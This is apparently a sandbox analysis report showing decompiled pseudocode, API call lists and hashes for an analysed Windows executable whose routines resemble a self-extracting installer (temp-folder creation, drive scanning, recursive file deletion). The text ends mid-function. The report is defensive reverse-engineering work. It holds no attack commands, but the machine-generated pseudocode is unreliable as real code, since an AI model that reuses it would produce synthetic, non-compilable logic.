                                                                        • Not Executed
                                                                        control_flow_graph 478 3d5467-3d5484 479 3d551c-3d5528 call 3d1680 478->479 480 3d548a-3d5490 call 3d53a1 478->480 484 3d552d-3d5539 call 3d58c8 479->484 483 3d5495-3d5497 480->483 485 3d549d-3d54c0 call 3d1781 483->485 486 3d5581-3d5583 483->486 493 3d554d-3d5552 484->493 494 3d553b-3d5545 CreateDirectoryA 484->494 495 3d550c-3d551a call 3d658a 485->495 496 3d54c2-3d54d8 GetSystemInfo 485->496 489 3d558d-3d559d call 3d6ce0 486->489 500 3d5585-3d558b 493->500 501 3d5554-3d5557 call 3d597d 493->501 498 3d5577-3d557c call 3d6285 494->498 499 3d5547 494->499 495->484 502 3d54fe 496->502 503 3d54da-3d54dd 496->503 498->486 499->493 500->489 511 3d555c-3d555e 501->511 512 3d5503-3d5507 call 3d658a 502->512 509 3d54df-3d54e2 503->509 510 3d54f7-3d54fc 503->510 513 3d54e4-3d54e7 509->513 514 3d54f0-3d54f5 509->514 510->512 511->500 515 3d5560-3d5566 511->515 512->495 513->495 517 3d54e9-3d54ee 513->517 514->512 515->486 518 3d5568-3d5575 RemoveDirectoryA 515->518 517->512 518->486
                                                                        C-Code - Quality: 75%
                                                                        			E003D5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _SYSTEM_INFO _v304;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t10;
                                                                        				void* _t13;
                                                                        				intOrPtr _t14;
                                                                        				void* _t16;
                                                                        				void* _t20;
                                                                        				signed int _t26;
                                                                        				void* _t28;
                                                                        				void* _t29;
                                                                        				CHAR* _t48;
                                                                        				signed int _t49;
                                                                        				intOrPtr _t61;
                                                                        
                                                                        				_t10 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t10 ^ _t49;
                                                                        				_push(__ecx);
                                                                        				if(__edx == 0) {
                                                                        					_t48 = 0x3d91e4;
                                                                        					_t42 = 0x104;
                                                                        					E003D1680(0x3d91e4, 0x104);
                                                                        					L14:
                                                                        					_t13 = E003D58C8(_t48); // executed
                                                                        					if(_t13 != 0) {
                                                                        						L17:
                                                                        						_t42 = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							L23:
                                                                        							 *0x3d9124 = 0;
                                                                        							_t14 = 1;
                                                                        							L24:
                                                                        							return E003D6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                        						}
                                                                        						_t16 = E003D597D(_t48, _t42, 1, 0); // executed
                                                                        						if(_t16 != 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_t61 =  *0x3d8a20; // 0x0
                                                                        						if(_t61 != 0) {
                                                                        							 *0x3d8a20 = 0;
                                                                        							RemoveDirectoryA(_t48);
                                                                        						}
                                                                        						L22:
                                                                        						_t14 = 0;
                                                                        						goto L24;
                                                                        					}
                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                        						 *0x3d9124 = E003D6285();
                                                                        						goto L22;
                                                                        					}
                                                                        					 *0x3d8a20 = 1;
                                                                        					goto L17;
                                                                        				}
                                                                        				_t42 =  &_v268;
                                                                        				_t20 = E003D53A1(__ecx,  &_v268); // executed
                                                                        				if(_t20 == 0) {
                                                                        					goto L22;
                                                                        				}
                                                                        				_push(__ecx);
                                                                        				_t48 = 0x3d91e4;
                                                                        				E003D1781(0x3d91e4, 0x104, __ecx,  &_v268);
                                                                        				if(( *0x3d9a34 & 0x00000020) == 0) {
                                                                        					L12:
                                                                        					_t42 = 0x104;
                                                                        					E003D658A(_t48, 0x104, 0x3d1140);
                                                                        					goto L14;
                                                                        				}
                                                                        				GetSystemInfo( &_v304);
                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                        				if(_t26 == 0) {
                                                                        					_push("i386");
                                                                        					L11:
                                                                        					E003D658A(_t48, 0x104);
                                                                        					goto L12;
                                                                        				}
                                                                        				_t28 = _t26 - 1;
                                                                        				if(_t28 == 0) {
                                                                        					_push("mips");
                                                                        					goto L11;
                                                                        				}
                                                                        				_t29 = _t28 - 1;
                                                                        				if(_t29 == 0) {
                                                                        					_push("alpha");
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t29 != 1) {
                                                                        					goto L12;
                                                                        				}
                                                                        				_push("ppc");
                                                                        				goto L11;
                                                                        			}




















                                                                        0x003d5472
                                                                        0x003d5479
                                                                        0x003d5481
                                                                        0x003d5484
                                                                        0x003d551c
                                                                        0x003d5521
                                                                        0x003d5528
                                                                        0x003d552d
                                                                        0x003d552f
                                                                        0x003d5539
                                                                        0x003d554d
                                                                        0x003d554d
                                                                        0x003d5552
                                                                        0x003d5585
                                                                        0x003d5585
                                                                        0x003d558b
                                                                        0x003d558d
                                                                        0x003d559d
                                                                        0x003d559d
                                                                        0x003d5557
                                                                        0x003d555e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5560
                                                                        0x003d5566
                                                                        0x003d5569
                                                                        0x003d556f
                                                                        0x003d556f
                                                                        0x003d5581
                                                                        0x003d5581
                                                                        0x00000000
                                                                        0x003d5581
                                                                        0x003d5545
                                                                        0x003d557c
                                                                        0x00000000
                                                                        0x003d557c
                                                                        0x003d5547
                                                                        0x00000000
                                                                        0x003d5547
                                                                        0x003d548a
                                                                        0x003d5490
                                                                        0x003d5497
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d549d
                                                                        0x003d54ab
                                                                        0x003d54b4
                                                                        0x003d54c0
                                                                        0x003d550c
                                                                        0x003d5511
                                                                        0x003d5515
                                                                        0x00000000
                                                                        0x003d5515
                                                                        0x003d54c9
                                                                        0x003d54d6
                                                                        0x003d54d8
                                                                        0x003d54fe
                                                                        0x003d5503
                                                                        0x003d5507
                                                                        0x00000000
                                                                        0x003d5507
                                                                        0x003d54da
                                                                        0x003d54dd
                                                                        0x003d54f7
                                                                        0x00000000
                                                                        0x003d54f7
                                                                        0x003d54df
                                                                        0x003d54e2
                                                                        0x003d54f0
                                                                        0x00000000
                                                                        0x003d54f0
                                                                        0x003d54e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d54e9
                                                                        0x00000000

                                                                        APIs
                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D54C9
                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D553D
                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D556F
                                                                          • Part of subcall function 003D53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D53FB
                                                                          • Part of subcall function 003D53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5402
                                                                          • Part of subcall function 003D53A1: GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D541F
                                                                          • Part of subcall function 003D53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D542B
                                                                          • Part of subcall function 003D53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5434
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                        • API String ID: 1979080616-3881341942
                                                                        • Opcode ID: 6fd1aab4667189c75a25a100938a45305b689cce75dc83fade92933d3a68f550
                                                                        • Instruction ID: 6cad5e8b03d1d673e775f44e22e528dde7a718cc1612a538fa359bc7fa552890
                                                                        • Opcode Fuzzy Hash: 6fd1aab4667189c75a25a100938a45305b689cce75dc83fade92933d3a68f550
                                                                        • Instruction Fuzzy Hash: D431E373B01A15ABCB139B69BC45ABE77AFAB82340F05012BE803C6790DB70CF418691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 86%
                                                                        			E003D2390(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				char _v284;
                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t21;
                                                                        				int _t36;
                                                                        				void* _t46;
                                                                        				void* _t62;
                                                                        				void* _t63;
                                                                        				CHAR* _t65;
                                                                        				void* _t66;
                                                                        				signed int _t67;
                                                                        				signed int _t69;
                                                                        
                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                        				_t21 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_t22 = _t21 ^ _t69;
                                                                        				_v8 = _t21 ^ _t69;
                                                                        				_t65 = __ecx;
                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                        					L10:
                                                                        					_pop(_t62);
                                                                        					_pop(_t66);
                                                                        					_pop(_t46);
                                                                        					return E003D6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                        				} else {
                                                                        					E003D1680( &_v276, 0x104, __ecx);
                                                                        					_t58 = 0x104;
                                                                        					E003D16B3( &_v280, 0x104, "*");
                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                        					_t63 = _t22;
                                                                        					if(_t63 == 0xffffffff) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        					do {
                                                                        						L3:
                                                                        						_t58 = 0x104;
                                                                        						E003D1680( &_v276, 0x104, _t65);
                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                        							_t58 = 0x104;
                                                                        							E003D16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                        							DeleteFileA( &_v280);
                                                                        						} else {
                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                        								E003D16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                        								_t58 = 0x104;
                                                                        								E003D658A( &_v280, 0x104, 0x3d1140);
                                                                        								E003D2390( &_v284);
                                                                        							}
                                                                        						}
                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                        					} while (_t36 != 0);
                                                                        					FindClose(_t63); // executed
                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                        					goto L10;
                                                                        				}
                                                                        			}





















                                                                        0x003d2398
                                                                        0x003d239e
                                                                        0x003d23a3
                                                                        0x003d23a5
                                                                        0x003d23ae
                                                                        0x003d23b3
                                                                        0x003d24cb
                                                                        0x003d24d2
                                                                        0x003d24d3
                                                                        0x003d24d4
                                                                        0x003d24df
                                                                        0x003d23c2
                                                                        0x003d23d1
                                                                        0x003d23db
                                                                        0x003d23e4
                                                                        0x003d23f6
                                                                        0x003d23fc
                                                                        0x003d2401
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d2407
                                                                        0x003d2407
                                                                        0x003d2408
                                                                        0x003d2411
                                                                        0x003d241f
                                                                        0x003d247a
                                                                        0x003d2483
                                                                        0x003d2495
                                                                        0x003d24a3
                                                                        0x003d2421
                                                                        0x003d242f
                                                                        0x003d2453
                                                                        0x003d245d
                                                                        0x003d2466
                                                                        0x003d2472
                                                                        0x003d2472
                                                                        0x003d242f
                                                                        0x003d24af
                                                                        0x003d24b5
                                                                        0x003d24be
                                                                        0x003d24c5
                                                                        0x00000000
                                                                        0x003d24c5

                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(?,003D8A3A,003D11F4,003D8A3A,00000000,?,?), ref: 003D23F6
                                                                        • lstrcmpA.KERNEL32(?,003D11F8), ref: 003D2427
                                                                        • lstrcmpA.KERNEL32(?,003D11FC), ref: 003D243B
                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 003D2495
                                                                        • DeleteFileA.KERNEL32(?), ref: 003D24A3
                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 003D24AF
                                                                        • FindClose.KERNELBASE(00000000), ref: 003D24BE
                                                                        • RemoveDirectoryA.KERNELBASE(003D8A3A), ref: 003D24C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                        • String ID:
                                                                        • API String ID: 836429354-0
                                                                        • Opcode ID: 2fbb3fb50112452bcbae29dac322fd37f88278e51cebe5d5b63712f3f4427b6e
                                                                        • Instruction ID: 15d50771702b26fa130c95e843856f33bed148e8681e0f1144e8d77524fbc43d
                                                                        • Opcode Fuzzy Hash: 2fbb3fb50112452bcbae29dac322fd37f88278e51cebe5d5b63712f3f4427b6e
                                                                        • Instruction Fuzzy Hash: D5317233605640ABC323DBA4FD89AEB73ACAFD4705F04492FF95586390EB7499098752
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E003D2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				long _t4;
                                                                        				void* _t6;
                                                                        				intOrPtr _t7;
                                                                        				void* _t9;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				intOrPtr* _t17;
                                                                        				signed char _t19;
                                                                        				intOrPtr* _t21;
                                                                        				void* _t22;
                                                                        				void* _t24;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t4 = GetVersion();
                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                        					if(_t12 != 0) {
                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                        						if(_t21 != 0) {
                                                                        							_t17 = _t21;
                                                                        							 *0x3da288(0, 1, 0, 0);
                                                                        							 *_t21();
                                                                        							_t29 = _t24 - _t24;
                                                                        							if(_t24 != _t24) {
                                                                        								_t17 = 4;
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t20 = _a12;
                                                                        				_t18 = _a4;
                                                                        				 *0x3d9124 = 0;
                                                                        				if(E003D2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                        					_t9 = E003D2F1D(_t18, _t20); // executed
                                                                        					_t22 = _t9; // executed
                                                                        					E003D52B6(0, _t18, _t21, _t22); // executed
                                                                        					if(_t22 != 0) {
                                                                        						_t32 =  *0x3d8a3a; // 0x0
                                                                        						if(_t32 == 0) {
                                                                        							_t19 =  *0x3d9a2c; // 0x0
                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                        								E003D1F90(_t19, _t21, _t22);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t6 =  *0x3d8588; // 0x0
                                                                        				if(_t6 != 0) {
                                                                        					CloseHandle(_t6);
                                                                        				}
                                                                        				_t7 =  *0x3d9124; // 0x0
                                                                        				return _t7;
                                                                        			}


















                                                                        0x003d2c03
                                                                        0x003d2c0d
                                                                        0x003d2c18
                                                                        0x003d2c20
                                                                        0x003d2c2e
                                                                        0x003d2c32
                                                                        0x003d2c36
                                                                        0x003d2c3d
                                                                        0x003d2c43
                                                                        0x003d2c45
                                                                        0x003d2c47
                                                                        0x003d2c49
                                                                        0x003d2c4e
                                                                        0x003d2c4e
                                                                        0x003d2c47
                                                                        0x003d2c32
                                                                        0x003d2c20
                                                                        0x003d2c50
                                                                        0x003d2c54
                                                                        0x003d2c57
                                                                        0x003d2c64
                                                                        0x003d2c66
                                                                        0x003d2c6b
                                                                        0x003d2c6d
                                                                        0x003d2c74
                                                                        0x003d2c76
                                                                        0x003d2c7c
                                                                        0x003d2c7e
                                                                        0x003d2c87
                                                                        0x003d2c89
                                                                        0x003d2c89
                                                                        0x003d2c87
                                                                        0x003d2c7c
                                                                        0x003d2c74
                                                                        0x003d2c8e
                                                                        0x003d2c95
                                                                        0x003d2c98
                                                                        0x003d2c98
                                                                        0x003d2c9e
                                                                        0x003d2ca7

                                                                        APIs
                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,003D6BB0,003D0000,00000000,00000002,0000000A), ref: 003D2C03
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,003D6BB0,003D0000,00000000,00000002,0000000A), ref: 003D2C18
                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 003D2C28
                                                                        • CloseHandle.KERNEL32(00000000,?,?,003D6BB0,003D0000,00000000,00000002,0000000A), ref: 003D2C98
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                        • API String ID: 62482547-3460614246
                                                                        • Opcode ID: d7dc738dac340851708a809d416ba39d7be189b03a8292236c6c05ec288c4fe2
                                                                        • Instruction ID: 70be843c4de999e1e0f2c0a1dffc35b6cd30df3e56b2aa6db75099e23d4f91a9
                                                                        • Opcode Fuzzy Hash: d7dc738dac340851708a809d416ba39d7be189b03a8292236c6c05ec288c4fe2
                                                                        • Instruction Fuzzy Hash: FC11EC736222056BC7236BB5BD89A6F376DABA8380F060417F810D7354CA21DC018661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D6F40() {
                                                                        
                                                                        				SetUnhandledExceptionFilter(E003D6EF0); // executed
                                                                        				return 0;
                                                                        			}



                                                                        0x003d6f45
                                                                        0x003d6f4d

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 003D6F45
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 8c6f037d730ed5f679021c7fb2cd34166d71ea476613bf899ca28b64eadd7d12
                                                                        • Instruction ID: 1b0c9f09e24784cc42c6f60c8b1835d67b734b2f60c2e1d0b104d5f550566850
                                                                        • Opcode Fuzzy Hash: 8c6f037d730ed5f679021c7fb2cd34166d71ea476613bf899ca28b64eadd7d12
                                                                        • Instruction Fuzzy Hash: B69002652525009796121B70BF1A45577995A4D743F815462E021C4594DB6040405512
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 232 3d55a0-3d55d9 call 3d468f LocalAlloc 235 3d55fd-3d560c call 3d468f 232->235 236 3d55db-3d55f1 call 3d44b9 call 3d6285 232->236 241 3d560e-3d5630 call 3d44b9 LocalFree 235->241 242 3d5632-3d5643 lstrcmpA 235->242 251 3d55f6-3d55f8 236->251 241->251 245 3d564b-3d5659 LocalFree 242->245 246 3d5645 242->246 249 3d565b-3d565d 245->249 250 3d5696-3d569c 245->250 246->245 255 3d565f-3d5667 249->255 256 3d5669 249->256 253 3d589f-3d58b5 call 3d6517 250->253 254 3d56a2-3d56a8 250->254 252 3d58b7-3d58c7 call 3d6ce0 251->252 253->252 254->253 258 3d56ae-3d56c1 GetTempPathA 254->258 255->256 259 3d566b-3d567a call 3d5467 255->259 256->259 263 3d56f3-3d5711 call 3d1781 258->263 264 3d56c3-3d56c9 call 3d5467 258->264 271 3d589b-3d589d 259->271 272 3d5680-3d5691 call 3d44b9 259->272 274 3d586c-3d5890 GetWindowsDirectoryA call 3d597d 263->274 275 3d5717-3d5729 GetDriveTypeA 263->275 270 3d56ce-3d56d0 264->270 270->271 276 3d56d6-3d56df call 3d2630 270->276 271->252 272->251 274->263 288 3d5896 274->288 278 3d572b-3d572e 275->278 279 3d5730-3d5740 GetFileAttributesA 275->279 276->263 289 3d56e1-3d56ed call 3d5467 276->289 278->279 282 3d5742-3d5745 278->282 279->282 283 3d577e-3d578f call 3d597d 279->283 286 3d576b 282->286 287 3d5747-3d574f 282->287 295 3d5791-3d579e call 3d2630 283->295 296 3d57b2-3d57bf call 3d2630 283->296 291 3d5771-3d5779 286->291 287->291 292 3d5751-3d5753 287->292 288->271 289->263 289->271 298 3d5864-3d5866 291->298 292->291 297 3d5755-3d5762 call 3d6952 292->297 295->286 306 3d57a0-3d57b0 call 3d597d 295->306 307 3d57c1-3d57cd GetWindowsDirectoryA 296->307 308 3d57d3-3d57f8 call 3d658a GetFileAttributesA 296->308 297->286 309 3d5764-3d5769 297->309 298->274 298->275 306->286 306->296 307->308 314 3d580a 308->314 315 3d57fa-3d5808 CreateDirectoryA 308->315 309->283 309->286 316 3d580d-3d580f 314->316 315->316 317 3d5827-3d585c SetFileAttributesA call 3d1781 call 3d5467 316->317 318 3d5811-3d5825 316->318 317->271 323 3d585e 317->323 318->298 323->298
                                                                        C-Code - Quality: 92%
                                                                        			E003D55A0(void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v265;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				int _t32;
                                                                        				int _t33;
                                                                        				int _t35;
                                                                        				signed int _t36;
                                                                        				signed int _t38;
                                                                        				int _t40;
                                                                        				int _t44;
                                                                        				long _t48;
                                                                        				int _t49;
                                                                        				int _t50;
                                                                        				signed int _t53;
                                                                        				int _t54;
                                                                        				int _t59;
                                                                        				char _t60;
                                                                        				int _t65;
                                                                        				char _t66;
                                                                        				int _t67;
                                                                        				int _t68;
                                                                        				int _t69;
                                                                        				int _t70;
                                                                        				int _t71;
                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                        				int _t73;
                                                                        				CHAR* _t82;
                                                                        				CHAR* _t88;
                                                                        				void* _t103;
                                                                        				signed int _t110;
                                                                        
                                                                        				_t28 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t28 ^ _t110;
                                                                        				_t2 = E003D468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                        				if(_t109 != 0) {
                                                                        					_t82 = "RUNPROGRAM";
                                                                        					_t32 = E003D468F(_t82, _t109, 1);
                                                                        					__eflags = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                        						__eflags = _t33;
                                                                        						if(_t33 == 0) {
                                                                        							 *0x3d9a30 = 1;
                                                                        						}
                                                                        						LocalFree(_t109);
                                                                        						_t35 =  *0x3d8b3e; // 0x0
                                                                        						__eflags = _t35;
                                                                        						if(_t35 == 0) {
                                                                        							__eflags =  *0x3d8a24; // 0x0
                                                                        							if(__eflags != 0) {
                                                                        								L46:
                                                                        								_t101 = 0x7d2;
                                                                        								_t36 = E003D6517(_t82, 0x7d2, 0, E003D3210, 0, 0);
                                                                        								asm("sbb eax, eax");
                                                                        								_t38 =  ~( ~_t36);
                                                                        							} else {
                                                                        								__eflags =  *0x3d9a30; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									goto L46;
                                                                        								} else {
                                                                        									_t109 = 0x3d91e4;
                                                                        									_t40 = GetTempPathA(0x104, 0x3d91e4);
                                                                        									__eflags = _t40;
                                                                        									if(_t40 == 0) {
                                                                        										L19:
                                                                        										_push(_t82);
                                                                        										E003D1781( &_v268, 0x104, _t82, "A:\\");
                                                                        										__eflags = _v268 - 0x5a;
                                                                        										if(_v268 <= 0x5a) {
                                                                        											do {
                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                        												__eflags = _t109 - 6;
                                                                        												if(_t109 == 6) {
                                                                        													L22:
                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                        													__eflags = _t48 - 0xffffffff;
                                                                        													if(_t48 != 0xffffffff) {
                                                                        														goto L30;
                                                                        													} else {
                                                                        														goto L23;
                                                                        													}
                                                                        												} else {
                                                                        													__eflags = _t109 - 3;
                                                                        													if(_t109 != 3) {
                                                                        														L23:
                                                                        														__eflags = _t109 - 2;
                                                                        														if(_t109 != 2) {
                                                                        															L28:
                                                                        															_t66 = _v268;
                                                                        															goto L29;
                                                                        														} else {
                                                                        															_t66 = _v268;
                                                                        															__eflags = _t66 - 0x41;
                                                                        															if(_t66 == 0x41) {
                                                                        																L29:
                                                                        																_t60 = _t66 + 1;
                                                                        																_v268 = _t60;
                                                                        																goto L42;
                                                                        															} else {
                                                                        																__eflags = _t66 - 0x42;
                                                                        																if(_t66 == 0x42) {
                                                                        																	goto L29;
                                                                        																} else {
                                                                        																	_t68 = E003D6952( &_v268);
                                                                        																	__eflags = _t68;
                                                                        																	if(_t68 == 0) {
                                                                        																		goto L28;
                                                                        																	} else {
                                                                        																		__eflags = _t68 - 0x19000;
                                                                        																		if(_t68 >= 0x19000) {
                                                                        																			L30:
                                                                        																			_push(0);
                                                                        																			_t103 = 3;
                                                                        																			_t49 = E003D597D( &_v268, _t103, 1);
                                                                        																			__eflags = _t49;
                                                                        																			if(_t49 != 0) {
                                                                        																				L33:
                                                                        																				_t50 = E003D2630(0,  &_v268, 1);
                                                                        																				__eflags = _t50;
                                                                        																				if(_t50 != 0) {
                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                        																				}
                                                                        																				_t88 =  &_v268;
                                                                        																				E003D658A(_t88, 0x104, "msdownld.tmp");
                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                        																				if(_t53 != 0xffffffff) {
                                                                        																					_t54 = _t53 & 0x00000010;
                                                                        																					__eflags = _t54;
                                                                        																				} else {
                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                        																				}
                                                                        																				__eflags = _t54;
                                                                        																				if(_t54 != 0) {
                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                        																					_push(_t88);
                                                                        																					_t109 = 0x3d91e4;
                                                                        																					E003D1781(0x3d91e4, 0x104, _t88,  &_v268);
                                                                        																					_t101 = 1;
